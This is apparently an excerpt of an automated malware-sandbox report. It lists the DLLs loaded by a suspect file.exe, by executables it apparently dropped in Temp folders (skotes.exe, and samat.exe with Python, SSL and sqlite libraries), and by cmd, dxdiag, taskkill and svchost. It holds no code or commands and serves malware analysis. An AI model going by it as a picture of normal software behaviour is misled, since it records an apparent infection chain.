Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: python3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: libffi-8.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: libcrypto-3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: libssl-3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: pywintypes313.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\dxdiag.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxdiagn.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d12.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: devobj.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmmbase.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wmiclnt.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: userenv.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: profapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dsound.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: devrtl.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: spinf.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: drvstore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: spfileq.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wifidisplay.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mmdevapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mfplat.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: rtworkq.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mf.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mfcore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: ksuser.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mfsensorgroup.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: comppkgsup.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: windows.media.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: windows.applicationmodel.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dispbroker.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d12core.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxilconv.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3dscache.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mscat32.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: ddraw.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dciman32.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: avrt.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: audioses.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: msacm32.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: midimap.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dinput8.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: hid.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: inputhost.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: propsys.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: devenum.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: msdmo.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: quartz.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: elstrans.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
